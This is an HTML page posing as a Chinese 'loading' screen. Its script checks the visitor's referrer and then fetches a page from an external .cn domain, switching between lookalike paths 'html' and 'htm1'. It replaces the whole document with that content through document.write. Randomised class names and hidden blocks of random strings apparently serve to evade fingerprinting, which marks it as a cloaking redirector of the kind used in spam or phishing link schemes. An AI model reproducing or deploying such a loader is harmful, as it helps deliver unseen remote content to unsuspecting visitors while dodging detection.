<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Tet0Lq {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Tet0Lq .saze9Q {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Tet0Lq .content {
            line-height: 50px;
            text-align: center
        }

        .Tet0Lq .img {
            width: 100%
        }

        .Tet0Lq .xY5EXz {
            text-align: center
        }

        .Tet0Lq .xY5EXz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Tet0Lq .xY5EXz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Tet0Lq .xY5EXz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Tet0Lq .xY5EXz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Tet0Lq .xY5EXz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Tet0Lq .xY5EXz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Tet0Lq .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function vbomMntOR95Ij(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var cTPqx = vbomMntOR95Ij('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ cTPqx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ cTPqx +".html?a=share";
		}
		
        nKvL8Jk=url+"#"+new Date().getTime();
        nKvL8Jk && function() {
            $.get(nKvL8Jk, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>HRVru4ifZClM8KSArw86l8gX447wxDz7TQ3W95Tz1Y2FKD6WKuVhjgsrBOjoRczdsruvXz0kbuLDt9kwrrV5</div>
<img  src='' style='display:none'>
<div style='display:none'>HRVru4ifZClM8KSArw86l8gX447wxDz7TQ3W95Tz1Y2FKD6WKuVhjgsrBOjoRczdsruvXz0kbuLDt9kwrrV5</div>
<li style='display:none' >PSd14uAR0q2wxFC1HXURglwolk1PJbKCAlBDLGfGwAkIhNGWDqGhbZMn00aL0eUHsiOJAS6mfdXxqjQEMjnEOCR35VDUixASQtCc</li>
<p  style='display:none'>KPf4a7BImY6Mf5RwB3HiXkhiSEXU4EhW</p>
<ul style='display:none' >CpgFPFR9Mjab1hPhjCQ</ul>
<a  href='#' style='display:none'>P3pEdi93mCJOqPSRCEy8Y</a>
<img  src='' style='display:none'>
<li style='display:none' >PSd14uAR0q2wxFC1HXURglwolk1PJbKCAlBDLGfGwAkIhNGWDqGhbZMn00aL0eUHsiOJAS6mfdXxqjQEMjnEOCR35VDUixASQtCc</li><div class="Tet0Lq">
    <div class="saze9Q">
        <div class="xY5EXz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>wVs6ENIMz7c</a>
<div style='display:none'>STs9LFoOCdAuQ1QAQ0KK0KN85nZv2vSDr8E9vil93vcn</div>
<h1 style='display:none' >V90XJGmoHyqYVvXjQqwKKF5hIiAvI4uR67t157qPjaBb1tDFlff97d8</h1>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<p  style='display:none'>jAqZkiD5Lq2IfWJu</p>
<ul style='display:none' >Xop5Oy8r0yN62ZAU9h8BNPs7qdZ4hs6AkFhzuw0MJ8ROBe8kaoqx3oMsST65IpHgfIcjyTAw1S9s1gSY6</ul></body>
</html>